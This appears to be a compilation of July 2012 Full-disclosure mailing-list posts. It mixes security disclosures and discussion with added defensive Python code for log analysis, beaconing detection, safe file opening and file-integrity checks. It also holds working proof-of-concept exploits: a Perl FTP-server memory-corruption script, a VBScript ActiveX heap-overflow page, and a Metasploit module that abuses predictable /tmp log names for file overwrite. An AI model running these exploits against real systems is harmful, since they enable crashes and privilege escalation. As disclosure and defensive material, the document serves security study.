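Jul 16 02:13:01 web1 sshd[2201]: Failed password for invalid user admin from 203.0.113.7 port 51022 ssh2
Jul 16 02:13:03 web1 sshd[2203]: Failed password for root from 203.0.113.7 port 51023 ssh2
Jul 16 02:13:05 web1 sshd[2205]: Failed password for root from 203.0.113.7 port 51024 ssh2
Jul 16 02:13:08 web1 sshd[2207]: Failed password for root from 203.0.113.7 port 51025 ssh2
Jul 16 02:13:20 web1 sshd[2210]: Accepted password for root from 203.0.113.7 port 51030 ssh2
Jul 16 02:14:02 web1 useradd[2250]: new user: name=svc_backup, UID=0, GID=0, home=/root, shell=/bin/bash
Jul 16 09:00:11 web1 sshd[3001]: Accepted publickey for alice from 192.0.2.10 port 40000 ssh2
Jul 16 09:05:40 web1 sshd[3010]: Failed password for alice from 192.0.2.10 port 40001 ssh2
Jul 16 09:05:45 web1 sshd[3012]: Accepted publickey for alice from 192.0.2.10 port 40002 ssh2
"""

FAILED_RE = re.compile(r"sshd\[\d+\]: Failed password for (?:invalid user )?(\S+) from (\S+) port")
ACCEPTED_RE = re.compile(r"sshd\[\d+\]: Accepted (\S+) for (\S+) from (\S+) port")
USERADD_RE = re.compile(r"useradd\[\d+\]: new user: name=([^,]+), UID=(\d+)")


def successes_after_failures(log_text, threshold=3):
    """Accepted login from a source that already had >= threshold failures.
    Returns (source_ip, user, failures_so_far) tuples in log order."""
    failures = Counter()
    findings = []
    for line in log_text.splitlines():
        m = FAILED_RE.search(line)
        if m:
            failures[m.group(2)] += 1
            continue
        m = ACCEPTED_RE.search(line)
        if m and failures[m.group(3)] >= threshold:
            findings.append((m.group(3), m.group(2), failures[m.group(3)]))
    return findings


def root_logins(log_text):
    """Direct root logins are worth reviewing; returns (auth_method, source_ip)."""
    return [(m.group(1), m.group(3))
            for m in map(ACCEPTED_RE.search, log_text.splitlines())
            if m and m.group(2) == "root"]


def uid0_accounts(log_text):
    """Accounts created with UID 0 under a name other than root: a persistence indicator."""
    return [m.group(1)
            for m in map(USERADD_RE.search, log_text.splitlines())
            if m and m.group(2) == "0" and m.group(1) != "root"]


def report(log_text):
    """Run every rule and return the findings keyed by rule name."""
    return {
        "brute_force_then_success": successes_after_failures(log_text),
        "root_logins": root_logins(log_text),
        "uid0_accounts": uid0_accounts(log_text),
    }


if __name__ == "__main__":
    for rule, hits in report(SAMPLE_AUTH_LOG).items():
        print(rule, hits)
```

The value of the rule-per-indicator layout is that each rule has a clear false-positive story (alice's single typo before a key-based login does not trip the threshold) and new indicators, such as cron or shell-history anomalies, slot in as further functions without touching the parsing of existing ones.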


[Full-disclosure] Telnet Ftp Server = Memory Corruption PoC

2012-07-16 Thread kaveh ghaemmaghami
# Exploit Title: Telnet Ftp Server = Memory Corruption PoC
# crash:http://img40.imageshack.us/img40/595/ftpqm.jpg
# Date: July 7, 2012
# Author: coolkaveh
# coolka...@rocketmail.com
# https://twitter.com/coolkaveh
# Vendor Homepage: http://www.slimbyte.sufx.net/
# also download link available at : http://telnet-ftp-server.en.softonic.com/
# Version: 1.0  build(1.218)
# Tested on: windows 7 SP1
#~~~
# Crappy Telnet Ftp Server Memory Corruption PoC
#~~~
#!/usr/bin/perl -w
use IO::Socket;
use Thread;
$|=1;
$host=shift;
$port=shift || 21;
if(!defined($host)){
print("usage: $0 \$host [\$port]\n");
exit(0);
}
# connectivity check before anything else
$check_first=IO::Socket::INET->new(PeerAddr=>$host,PeerPort=>$port,Timeout=>60);
if(defined $check_first){
print "$host - $port is alive.\n";
$check_first->close;
}else{
die("$host - $port is closed!\n");
}
@bf1=(
'A'x5,
);
@bf2=(
'!)!)',
);
@bf3=(
'0',
);
@t=@bf1;
push(@t, @bf2);
push(@t, @bf3);
# returns 1 if the control port still answers with a banner, 0 otherwise
sub check(){
#Thread->self->detach;

$sock=IO::Socket::INET->new(PeerAddr=>$host,PeerPort=>$port,Timeout=>60);
if(defined $sock){
#print "$host - $port is alive.\n";
undef($content_tmp);
$sock->recv($content_tmp,100,0);
if(length($content_tmp)>0){
$sock->close;
return 1;
}else{
$sock->close;
return 0;
}
}else{
#print("$host - $port is closed!\n");
return 0;
}
}
#set PASV Mode send Socket
sub send_sock($){
$send_port_num=shift;
Thread->self->detach;
$send_sock_tmp=IO::Socket::INET->new(PeerAddr=>$host,
PeerPort=>$send_port_num, Proto=>'tcp', Timeout=>30);
if(defined($send_sock_tmp)){
$send_sock_tmp->recv($mem,100,0);
print "$mem\n";
$mem=0;
$send_sock_tmp->close;
undef($send_port_num);
return 1;
}else{
undef($send_port_num);
return 0;
}
}
print "Please enter the real username: ";
$real_username=<STDIN>;
chop($real_username);
print "Please enter the real password: ";
$real_password=<STDIN>;
chop($real_password);
@cm=(
'STOR',
'STOR',
);
# log in once to verify the credentials before looping
$sock3=IO::Socket::INET->new(PeerAddr=>$host, PeerPort=>$port,
Proto=>'tcp', Timeout=>30);
if(defined($sock3)){
$sock3->recv($content, 100, 0);
print "$content\n";
sleep(2);
$sock3->send("USER ".$real_username."\r\n", 0);
sleep(2);
$sock3->recv($content, 100, 0);
print "$content\n";
sleep(2);
$sock3->send("PASS ".$real_password."\r\n", 0);
sleep(2);
$sock3->recv($content, 100, 0);
print "$content\n";
sleep(2);
if($content=~m/^230/){
$sock3->close;
}else{
$sock3->close;
die("Username or Password is wrong!\n");
}
}else{
die "$host - $port is closed!\n";
}
L_V_J: undef($cmd);
C_L: foreach $cmd (@cm){
foreach $poc (@t){
LABEL5: $sock4=IO::Socket::INET->new(PeerAddr=>$host,
PeerPort=>$port, Proto=>'tcp', Timeout=>30);
if(defined($sock4)){
$sock4->recv($content, 100, 0);
print "$content\n";
sleep(2);
$sock4->send("USER ".$real_username."\r\n", 0);
sleep(2);
$sock4->recv($content, 100, 0);
print "$content\n";
sleep(2);
$sock4->send("PASS ".$real_password."\r\n", 0);
sleep(2);
$sock4->recv($content, 100, 0);
print "$content\n";
sleep(2);
if(($cmd eq 'STOR')){
$sock4->send("PASV\r\n", 0);
sleep(2);
$sock4->recv($content, 100, 0);
print "$content\n";
sleep(2);

# PASV reply: 227 Entering Passive Mode (h1,h2,h3,h4,p1,p2)
if($content=~m/\((.*),(.*),(.*),(.*),(.*),(.*)\)/){
$send_port=$5*256+$6;
}
}
}
$sock4->send($cmd." ".$poc."\r\n", 0);
Thread->new(\&send_sock,$send_port);
$sock4->send($cmd." ".$poc."\r\n", 0);
sleep(2);
$sock4->recv($content, 100, 0);
$thread3=Thread->new(\&check);
undef($thread3);
$sock4->send("QUIT\r\n", 0);
}
}


[Full-disclosure] beSTORM ActiveX (WinGraphviz.dll) Remote Heap Overflow

2012-07-16 Thread kaveh ghaemmaghami
Exploit Title: beSTORM ActiveX (WinGraphviz.dll) Remote Heap Overflow PoC
Date: July 15, 2012
Author: coolkaveh
coolka...@rocketmail.com
Https://twitter.com/coolkaveh
Vendor Homepage: http://www.beyondsecurity.com/
Version: 3.5.6
Tested on: windows 7 SP1
Exploiting the Exploiters
What kind of crappy fuzzer is that ?
==
Registers:
--
EIP 01637FFB
EAX 41414141
EBX 0163 - 00905A4D - Asc: MZMZ
ECX 016FF838 - Asc: @A
EDX 41414141
EDI 
ESI 
EBP 0013FD24 - 0013FD34
ESP 0013FD10 - 0013FD34


Block Disassembly:
--
1637FE9 CMP DWORD PTR [EAX+10],0
1637FED JE SHORT 01638042
1637FEF MOV ECX,[EBP+8]
1637FF2 MOV EDX,[ECX+10]
1637FF5 MOV [EBP-4],EDX
1637FF8 MOV EAX,[EBP-4]
1637FFB CMP DWORD PTR [EAX],0 --- CRASH
1637FFE JE SHORT 01638042
1638000 MOV ECX,[EBP-4]
1638003 CMP DWORD PTR [ECX+10],0
1638007 JE SHORT 0163801B
1638009 MOV EDX,[EBP-4]
163800C MOV EAX,[EDX+10]
163800F MOV ECX,[EBP-4]
1638012 MOV EDX,[ECX+10]


ArgDump:

EBP+8   016FF838 - Asc: @A
EBP+12  016FF838 - Asc: @A


<html>
Test Exploit page
<object classid='clsid:684811FB-0523-420F-9E8F-A5452C65A19C'
id='fuzzer'></object>
<script language='vbscript'>

arg1=String(2068, "A")

fuzzer.ToSvg arg1

</script>
</html>



[Full-disclosure] XSS vulnerabilty on eenmiljardseconden.frankdeboosere.be

2012-07-16 Thread Yvan Janssens
Hello,

I found an XSS vulnerability in http://eenmiljardseconden.frankdeboosere.be/ . 
This vulnerability was possible due to invalid input validation/bad 
programming. The owner was contacted and a satiric fix was deployed.

Affected site:
http://eenmiljardseconden.frankdeboosere.be/
(media stunt of a Flemish television weather forecast presenter)

Details:
After entering a message on the "Stuur een bericht naar de toekomst" page, you 
are presented with a unique number for your request, to track it. You were then 
redirected to 
http://eenmiljardseconden.frankdeboosere.be/messagesent/id/[number of your 
request]. The number could be replaced by any value to inject content into the 
page.

It is now solved, and if you try to execute it again, you get a link to Rick 
Astley's "Never gonna give you up" on YT.

Timeline:
2012-05-29 - discovery and owner notification.
2012-05-30 - Fix
2012-05-31 - Disclosure at 42(at)discuss.hackerspaces.be mailing list.


Regards,
Yvan Janssens

Re: [Full-disclosure] XSS vulnerabilty on eenmiljardseconden.frankdeboosere.be

2012-07-16 Thread coderman
On Mon, Jul 16, 2012 at 12:23 AM, Yvan Janssens yvan.janss...@vasco.com wrote:

 I found an XSS vulnerability in http://eenmiljardseconden.frankdeboosere.be/
 . This vulnerability was possible due to invalid input validation/bad
 programming. The owner  was contacted and a satiric fix was deployed.
 ...
 It is now solved, and if you try to execute it again, you get a link to Rick
 Astley’s  “Never gonna give you up” on YT.

priceless! ++



Re: [Full-disclosure] CRYPTO-GRAM, July 15, 2012

2012-07-16 Thread coderman
On Sat, Jul 14, 2012 at 4:25 PM, Bruce Schneier schne...@schneier.com wrote:
  ...
 Many roadside farm stands in the U.S. are unstaffed.  They work on the honor
 system: take what you want, and pay what you owe.  I like systems that
 leverage personal moral codes for security.  But I'll bet that the pay boxes
 are bolted to the tables.

many but not most.

also, goats are exceptional sources of inspiration on side channel
attacks and insider threats. more on this later.. ;)

[i'd like to see a survey of info-sec specialists[0] turned ag
entrepreneurs. or sechors[0] as jya calls them...]


  The Failure of Anti-Virus Companies to Catch Military Malware

 Mikko Hypponen of F-Secure attempts to explain why anti-virus companies
 didn't catch Stuxnet, DuQu, and Flame.  His conclusion is simply that the
 attackers -- in this case, military intelligence agencies -- are simply
 better than commercial-grade anti-virus programs.

this is true. they are better.


 I don't buy this.  It isn't just the military that tests its malware against
 commercial defense products; criminals do it, too.

many criminals are also better!
 ... but not most. heh


 Probably the
 people who wrote Flame had a larger budget than a large-scale criminal
 organization.

as evidenced by novel MD5 collision attacks leveraged for windows
update MitM (aka, holy grail) and expansive A/V countermeasures via,
again novel, code injection methods.

they also do extensive QA to ensure success against their targets,
spanning whatever platform and processes. QA is expensive, and
methodical QA on malware; this makes me chortle!


 I think the difference has more to do with the ways in which these military
 malware programs spread.  That is, slowly and stealthily.

this is intended to preserve return on investment. maybe one
difference, but not the most significant.


 it seems
 clear that conventional non-military malware writers who want to evade
 detection should adopt the propagation techniques of Flame, Stuxnet, and
 DuQu.

they won't and they don't need to. conventional malware targets the
masses, and they're vulnerable without much effort.

military malware targets the specific, and they'll do whatever they
can (which is significant) to achieve success.

entirely different domains!



 ... I think there's an interesting discussion to be had about why
 the anti-virus companies all missed Flame for so long.
 http://www.f-secure.com/weblog/archives/2388.html

this is succinct and apropos. commercial A/V is not going to protect
against state sponsored attacks (of which world class malware is a
part).

such protection requires ..., well, far more than kaspersky can ever give you :P


0.  Reign of the Sechors
  http://cryptome.org/2012/07/sechors.htm



Re: [Full-disclosure] Linux - Indicators of compromise

2012-07-16 Thread Michael Stummvoll
 Greetings FD,

Hi

 Does anyone have any guidelines/useful material on analysing logs of a
 Linux machine to detect signs of compromise? 

First thing: You can NOT surely determine if a machine is compromised
from within the machine itself. Once a machine is compromised it can
(theoretically) react to every approach you take to detect it and
manipulate the output of your tools.

If something is compromised there is a high chance that it has to
communicate with somebody. So you could dump the network traffic on your
router or add a (transparent) network logger between your machine and
the router.

Another way would be shutting down the machine and analyzing it with a
live CD. But there is no general way to be sure whether it is compromised
or not.



Re: [Full-disclosure] Linux - Indicators of compromise

2012-07-16 Thread valdis . kletnieks
On Sat, 14 Jul 2012 12:46:50 -, Ali Varshovi  said:
 Most of the materials I've seen are more aligned to malware and rootkit
 detection which is not the only concern apparently.

It's hard to say what else to check without knowing what other concerns
you're checking for, and what data sources are available (I'm thinking about
auditd and friends, but there's other data sources as well).



Re: [Full-disclosure] Linux - Indicators of compromise

2012-07-16 Thread Gary Baribault
I suggest one of the first answers was the good one, intercept the
traffic routed to the internet with TCPDump. Filter out the normal
traffic and see what's left. All compromised systems talk to the
Internet to dump data or route spam. Be patient, some systems talk all
the time, some once an hour .. but you will find some unexplained
traffic. Once you do find that you're infected, don't bother cleaning up
the system, format and restore the data!

Gary Baribault
Courriel: g...@baribault.net
GPG Key: 0x685430d1
Signature: 9E4D 1B7C CB9F 9239 11D9 71C3 6C35 C6B7 6854 30D1
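The "filter out the normal traffic and see what's left" approach in practice, as an added example that is not from any post in this thread: it parses a connection log of the kind a transparent logger or a tcpdump post-processing script would produce, drops the destinations the admin can account for, and flags groups of connections whose timing is too regular to be a person. The log format, hosts and addresses are constructed for the example.

```python
import re
from collections import defaultdict
from statistics import mean, pstdev

# Added example, not from any post in this thread. The log format, hosts and
# addresses below are constructed; adapt LINE and ALLOW to your own logger.

# one line per outbound connection: <epoch> <src> -> <dst>:<port> <bytes>B
LINE = re.compile(r'^(\d+) (\S+) -> (\S+):(\d+) (\d+)B$')

SAMPLE_LOG = """\
1342450000 10.0.0.5 -> 192.0.2.53:53 74B
1342450000 10.0.0.5 -> 198.51.100.7:443 612B
1342450100 10.0.0.5 -> 203.0.113.20:80 1532B
1342450130 10.0.0.5 -> 203.0.113.20:80 9870B
1342450200 10.0.0.7 -> 192.0.2.10:443 4411B
1342453605 10.0.0.5 -> 198.51.100.7:443 598B
1342453800 10.0.0.7 -> 192.0.2.10:443 4390B
1342455000 10.0.0.5 -> 203.0.113.20:80 2210B
1342455020 10.0.0.5 -> 203.0.113.20:80 880B
1342457198 10.0.0.5 -> 198.51.100.7:443 601B
1342457400 10.0.0.7 -> 192.0.2.10:443 4402B
1342460801 10.0.0.5 -> 198.51.100.7:443 607B
1342461000 10.0.0.7 -> 192.0.2.10:443 4395B
1342464400 10.0.0.5 -> 198.51.100.7:443 610B
1342464600 10.0.0.7 -> 192.0.2.10:443 4408B
"""

# (destination, port) pairs the admin can account for: the resolver and the
# distribution's update mirror (constructed values)
ALLOW = {("192.0.2.53", 53), ("192.0.2.10", 443)}


def parse(lines):
    """Turn log lines into (ts, src, dst, port, size) tuples, skipping malformed ones."""
    flows = []
    for line in lines:
        m = LINE.match(line.strip())
        if m:
            ts, src, dst, port, size = m.groups()
            flows.append((int(ts), src, dst, int(port), int(size)))
    return flows


def filter_known(flows, allow=ALLOW):
    """'Filter out the normal traffic': drop flows to an allow-listed (dst, port)."""
    return [f for f in flows if (f[2], f[3]) not in allow]


def beacons(flows, min_count=4, max_jitter=0.1):
    """Flag (src, dst, port) groups whose inter-connection gaps are near-constant.

    A host that checks in every hour produces gaps with a tiny relative
    spread; interactive browsing does not. Returns {key: (count, mean_gap)}.
    """
    by_key = defaultdict(list)
    for ts, src, dst, port, _ in flows:
        by_key[(src, dst, port)].append(ts)
    found = {}
    for key, stamps in by_key.items():
        if len(stamps) < min_count:
            continue
        stamps.sort()
        gaps = [b - a for a, b in zip(stamps, stamps[1:])]
        mu = mean(gaps)
        if mu > 0 and pstdev(gaps) / mu <= max_jitter:
            found[key] = (len(stamps), mu)
    return found


def unexplained(lines):
    """Full pipeline over raw log lines: what is left after filtering, and which of it beacons."""
    leftover = filter_known(parse(lines))
    return leftover, beacons(leftover)


if __name__ == "__main__":
    leftover, hits = unexplained(SAMPLE_LOG.splitlines())
    print(f"{len(leftover)} unexplained flows")
    for (src, dst, port), (n, gap) in hits.items():
        print(f"{src} -> {dst}:{port}: {n} connections every ~{gap:.0f}s")
```

In the sample, the browsing bursts to 203.0.113.20 survive the allow-list but fail the regularity test, while the hourly connections from 10.0.0.5 to 198.51.100.7 are the one group left to explain.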


Re: [Full-disclosure] Linux - Indicators of compromise

2012-07-16 Thread Benji
 All compromised systems talk to the Internet to dump data or route spam.

yup, this is 1000% true and utterly foolproof.




[Full-disclosure] 0A29-12-2 :Metasploit 'pcap_log' plugin privilege escalation vulnerability

2012-07-16 Thread 0a29 40

0A29-12-2 : Metasploit 'pcap_log' plugin privilege escalation vulnerability

Author: 0a29406d9794e4f9b30b3c5d6702c708

twitter.com/0a29 - 0a29.blogspot.com - GMail 0a2940


Description:


Metasploit plugin 'pcap_log' is vulnerable to an arbitrary file overwrite bug
which can further be leveraged to insert user-controlled data resulting in
potential escalation of privileges


Timeline:


16 July 2012 - Reported
16 July 2012 - Acknowledged & fixed by HD Moore
https://github.com/rapid7/metasploit-framework/commit/428a98c1d1d5341d32ffe0ed380d06a327ed2740
16 July 2012 - Public disclosure
http://0a29.blogspot.com/2012/07/0a29-12-2-metasploit-pcaplog-plugin.html

Details:


By default the pcap_log plugin (plugins/pcap_log.rb) logs pcap to a file like
'/tmp/msf3-session_2012-07-16_15-15-35.pcap'. This is of course
predictable, so a simple 'ln' in advance to a privileged file will
result in arbitrary file overwrite. The module has to run as root.

Here's the fun part - by sending packets we can then insert our own
content into any file (surrounded by pcap headers and all
the other packets)

==
Sample PoC (needs work)

modules/post/linux/exploit/metasploit_pcaplog.rb
==

# $Id$
##

##
# ## This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'
require 'rex'
require 'msf/core/post/common'
require 'msf/core/post/file'
require 'msf/core/post/linux/system'

class Metasploit3 < Msf::Post

include Msf::Post::Common
include Msf::Post::File
include Msf::Post::Linux::System

def initialize(info={})
super( update_info( info,
'Name'  => 'Metasploit plugin pcap_log arbitrary file overwrite / privilege escalation',
'Description'   => %q{ Post exploitation module to
exploit 0A29-12-2, a vulnerability in metasploit pcap_log plugin.
Depending on the file you choose to
overwrite, you will need to netcat/telnet etc. the data
that you wish to appear in the file.},

'License'   => MSF_LICENSE,
'Author'=> [ '0a29406d9794e4f9b30b3c5d6702c708'],
'Version'   => '$Revision$',
'Platform'  => [ 'linux' ],
'SessionTypes'  => [ 'shell', 'meterpreter' ],
'References' =>
[
[ 'URL', 'http://0a29.blogspot.com/2012/07/0a29-12-2-metasploit-pcaplog-plugin.html' ],
[ 'URL', 'https://github.com/rapid7/metasploit-framework/commit/428a98c1d1d5341d32ffe0ed380d06a327ed2740' ]
],
'DisclosureDate'=> 'July 16 2012'
))
register_options([
OptInt.new('NUMBER', [true, 'Number of seconds to prime /tmp/ with', nil]),
OptString.new('FILE', [true, 'File to overwrite with PCAP data', nil]),
], self.class)
end

# Build the predictable pcap_log filename for time t and link FILE to it
def link(t)
file_part = "%s_%04d-%02d-%02d_%02d-%02d-%02d.pcap" % [
"msf3-session", t.year, t.month, t.mday, t.hour, t.min, t.sec
]
fname = ::File.join("/tmp", file_part)
retval = session.shell_command("/bin/ln #{datastore['FILE']} #{fname}")
end

# Run Method for when run command is issued
def run
for i in 0..(datastore['NUMBER'])
link(Time.now+1)
end
print_status("Set #{datastore['NUMBER']} links.")
end

def cleanup
print_status("Manual cleanup required: rm -f /tmp/msf3-session*")
end
end
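The bug class behind this advisory, shown from the defender's side as an added example (not the advisory's code and not Metasploit's): a log writer that opens a predictable name in a shared directory with a plain open() will follow a pre-planted link and truncate whatever it points at, while an open that is create-only and refuses symlinks fails closed. The paths, the victim file and the planted link are constructed inside a temporary directory.

```python
import errno
import os
import tempfile

# Added example, not from the advisory or from Metasploit. It contrasts the
# vulnerable open pattern with a hardened one on a pre-planted symlink.
# Everything below lives in a throwaway directory created by tempfile.


def open_log_unsafe(path):
    """The vulnerable pattern: open() follows symlinks and truncates the target."""
    return open(path, "wb")


def open_log_safe(path):
    """Hardened open for a log in a shared directory.

    O_CREAT|O_EXCL fails if anything (including a symlink) already exists at
    path, O_NOFOLLOW refuses to traverse a link, and the mode keeps the file
    private. Unpredictable names (tempfile.mkstemp) remove the race entirely;
    this open makes a planted link an error rather than an overwrite.
    """
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL | os.O_NOFOLLOW, 0o600)
    return os.fdopen(fd, "wb")


def demo():
    """Constructed scenario. Returns (victim after unsafe open, victim after
    safe open, errno name raised by the safe open, content of a fresh safe log)."""
    with tempfile.TemporaryDirectory() as tmp:
        victim = os.path.join(tmp, "victim.conf")  # stands in for a privileged file
        with open(victim, "wb") as f:
            f.write(b"important=1\n")

        # the predictable name from the advisory, pre-linked to the victim
        predictable = os.path.join(tmp, "msf3-session_2012-07-16_15-15-35.pcap")
        os.symlink(victim, predictable)

        # vulnerable: the write lands in victim.conf (0xd4c3b2a1 is the pcap magic)
        with open_log_unsafe(predictable) as f:
            f.write(b"\xd4\xc3\xb2\xa1 pcap header followed by captured packets\n")
        with open(victim, "rb") as f:
            after_unsafe = f.read()

        # reset the victim and retry with the hardened open
        with open(victim, "wb") as f:
            f.write(b"important=1\n")
        err_name = None
        try:
            with open_log_safe(predictable) as f:
                f.write(b"never written\n")
        except OSError as e:
            err_name = errno.errorcode[e.errno]
        with open(victim, "rb") as f:
            after_safe = f.read()

        # the hardened open still works for a name nobody planted
        fresh = os.path.join(tmp, "fresh.pcap")
        with open_log_safe(fresh) as f:
            f.write(b"ok\n")
        with open(fresh, "rb") as f:
            fresh_content = f.read()

        return after_unsafe, after_safe, err_name, fresh_content


if __name__ == "__main__":
    unsafe, safe, err, fresh = demo()
    print("unsafe open left victim as:", unsafe)
    print("safe open refused with", err, "and victim is:", safe)
    print("safe open on a fresh name wrote:", fresh)
```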



[Full-disclosure] Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin

2012-07-16 Thread king cope
Hi Lists,

it seems Microsoft doesn't want to patch the vulnerabilities I posted
back in June, at least not in the July update.

The posting included some important bugs in the Internet Information
Services, one of their flagship products:
http://seclists.org/fulldisclosure/2012/Jun/189

The July Security Bulletin doesn't mention any bug.
http://technet.microsoft.com/en-us/security/bulletin/ms12-jul

I wonder if Microsoft will silently patch the vulnerabilities or just
bluntly ignore them. I understand that Microsoft doesn't want to make a
big deal about the impact and exposure like in the past, yet I believe
that admins should be informed about the threats by their very side.
You have to remember that I put much effort into finding these
vulnerabilities and you get them for free. By resolving the bugs
Microsoft proves that they care about security even if these
vulnerabilities were disclosed uncoordinated yet free to patch.

/Kingcope



Re: [Full-disclosure] Linux - Indicators of compromise

2012-07-16 Thread Ali Varshovi
Thanks Feighen.

I had to say that I'm looking for solutions/guidelines that help in doing the 
analysis in a short period of time or a narrow shot of the system state.

Any thoughts?

Ali
Sent from my BlackBerry device

-Original Message-
From: Feighen Oosterbroek feig...@gmail.com
Date: Mon, 16 Jul 2012 09:26:05 
To: ali.varsh...@hotmail.com
Subject: Re: [Full-disclosure] Linux - Indicators of compromise


Hey

there are programs that can help to analyse log files. Logwatch comes to mind. 
There are possibly others. I suppose you could write a script to check file 
permissions and ownership changes over time, which could be a starting point 
for more in-depth checks.


Thanks and kind regards
Feighen


On 14 July 2012 14:46, Ali Varshovi ali.varsh...@hotmail.com wrote:
Greetings FD,

Does anyone have any guidelines/useful material on analysing logs of a Linux 
machine to detect signs of compromise? The data collection piece is not a 
challenge as a lot of useful information can be captured using commands and 
some scripts. I'm wondering if there is any systematic approach to analyze the 
collected logs? Most of the materials I've seen are more aligned to malware and 
rootkit detection which is not the only concern apparently.

Thanks,
Ali
Sent from my BlackBerry device



[Full-disclosure] [Benchmark][Tool] The 2012 Web Application Scanner Benchmark Was Published

2012-07-16 Thread Shay Chen
The 2012 web application vulnerability scanner benchmark was published,
covering 10 crucial aspects of 60 commercial and open source
web application scanners, including:

· Price & Feature Comparison (New!)
· Scanner Versatility Score (New!)
· Path Traversal/LFI Detection Accuracy (New! - 824 test cases!)
· Remote File Inclusion Detection Accuracy (New! - 114 test cases!)
· SQL Injection Detection Accuracy - Updated
· Cross Site Scripting Detection Accuracy - Updated
· Audit Feature Comparison - Updated
· WIVET score for scanners with crawling features (New!)
· Scanner Adaptability, Authentication, and a variety of other comparisons
· New Products!
· A step by step guide for choosing the best scanner for each task.

The benchmark can be accessed through the following address:
http://sectooladdict.blogspot.co.il/

The benchmark statistics can be viewed in greater detail in sectoolmarket:
http://sectoolmarket.com/

Commercial scanners price vs feature comparison:
http://sectoolmarket.com/path-traversal-local-file-inclusion-detection-accuracy-of-commercial-web-application-scanners.html
http://sectoolmarket.com/price-and-feature-comparison-of-web-application-scanners-unified-list.html

Re: [Full-disclosure] Linux - Indicators of compromise

2012-07-16 Thread Bzzz
On Sat, 14 Jul 2012 12:46:50 +
Ali Varshovi  ali.varsh...@hotmail.com wrote:

 Does anyone have any guidelines/useful material on analysing logs
 of a Linux machine to detect signs of compromise? The data
 collection piece is not a challenge as a lot of useful information
 can be captured using commands and some scripts. I'm wondering if
 there is any systematic approach to analyze the collected logs?
 Most of the materials I've seen are more aligned to malware and
 rootkit detection which is not the only concern apparently.

Hi Ali,

I'd say send log to another machine, use a checksumator (like
tripwire), store its computation files on an external storage 
device and when you check the system with it, boot it on a liveCD.

And as G.Baribault says, each compromised system tries to store its
findings elsewhere on the Internet (often encrypted these days), so
a fine traffic analyzer would be a good thing; but is there a very
good one working out of the box, I don't know!? (beware it can be
very disk space greedy).

JY
-- 
 Overfiend well, excellent.  I get to tear someone a new asshole.
-- in #debian-devel
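The "checksumator" idea from this reply, together with the earlier suggestion to script checks of file permissions and ownership over time, as one added example that is not from any post in the thread: build_baseline() records owner, group, mode and SHA-256 for every regular file under a root, and compare() reports what changed between two baselines. The baseline is meant to be kept on external storage and the comparison run from a live CD, as the thread recommends; the directory contents in demo() are constructed.

```python
import hashlib
import json
import os
import stat
import tempfile

# Added example, not from any post in the thread. A minimal tripwire-style
# checker: snapshot file metadata and content hashes, then diff two snapshots.


def _sha256(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root):
    """Return {relative_path: {uid, gid, mode, sha256}} for every regular file under root."""
    baseline = {}
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames.sort()  # deterministic walk order
        for name in sorted(filenames):
            full = os.path.join(dirpath, name)
            st = os.lstat(full)  # lstat: never follow a symlink into another tree
            if not stat.S_ISREG(st.st_mode):
                continue
            baseline[os.path.relpath(full, root)] = {
                "uid": st.st_uid,
                "gid": st.st_gid,
                "mode": stat.S_IMODE(st.st_mode),
                "sha256": _sha256(full),
            }
    return baseline


def compare(old, new):
    """Return sorted (path, kind, detail) findings; kind is added, removed or changed."""
    findings = []
    for path in sorted(set(old) | set(new)):
        if path not in old:
            findings.append((path, "added", ""))
        elif path not in new:
            findings.append((path, "removed", ""))
        else:
            diffs = [k for k in ("uid", "gid", "mode", "sha256") if old[path][k] != new[path][k]]
            if diffs:
                findings.append((path, "changed", ",".join(diffs)))
    return findings


def save_baseline(baseline, path):
    """Write the baseline as JSON; store it off the host (USB key, read-only share)."""
    with open(path, "w") as f:
        json.dump(baseline, f, sort_keys=True)


def load_baseline(path):
    with open(path) as f:
        return json.load(f)


def demo():
    """Constructed scenario: snapshot a directory, alter it the way a compromise
    would show up (replaced binary, loosened permission, dropped file), diff."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "bin"))
        with open(os.path.join(root, "bin", "ls"), "wb") as f:
            f.write(b"original binary\n")
        with open(os.path.join(root, "passwd"), "wb") as f:
            f.write(b"root:x:0:0::/root:/bin/sh\n")
        os.chmod(os.path.join(root, "passwd"), 0o644)
        before = build_baseline(root)

        with open(os.path.join(root, "bin", "ls"), "wb") as f:
            f.write(b"replaced binary\n")
        os.chmod(os.path.join(root, "passwd"), 0o666)
        with open(os.path.join(root, ".hidden"), "wb") as f:
            f.write(b"unexpected file\n")
        after = build_baseline(root)
        return compare(before, after)


if __name__ == "__main__":
    for path, kind, detail in demo():
        print(f"{kind:8} {path} {detail}")
```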



Re: [Full-disclosure] Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin

2012-07-16 Thread Григорий Братислава
On Mon, Jul 16, 2012 at 1:24 PM, king cope
isowarez.isowarez.isowa...@googlemail.com wrote:
 Hi Lists,

 it seems Microsoft doesn't want to patch the vulnerabilities I posted
 back in June,
 at least not in the July update.


Hello Full Disclosure!! !! !!

Is like to introduce you to Schrödinger's Cat and Wigner's Friend in
is Computer Security. 'The Wigner's Friend thought experiment posits a
friend of Wigner who performs the Schrödinger's cat experiment after
Wigner leaves the laboratory. Only when he returns does Wigner learn
the result of the experiment from his friend, that is, whether the cat
is alive or dead. The question is raised: was the state of the system
a superposition of dead cat/sad friend and live cat/happy friend,
only determined when Wigner learned the result of the experiment, or
was it determined at some previous point?'

http://en.wikipedia.org/wiki/Wigner's_friend
http://en.wikipedia.org/wiki/Schr%C3%B6dinger%27s_cat

IIS is neither vulnerable or not vulnerable. Is until you is exploit
it and verify!



Re: [Full-disclosure] Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin

2012-07-16 Thread Thor (Hammer of God)
Right - if you've compromised the server to the point you can alter
directory structures/names, then you've already bypassed the ACLs required
in order to exploit the vulnerability that allows you to bypass the
ACLs.  I don't get it.

t





Re: [Full-disclosure] Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin

2012-07-16 Thread Григорий Братислава
On Mon, Jul 16, 2012 at 1:54 PM, Thor (Hammer of God)
t...@hammerofgod.com wrote:
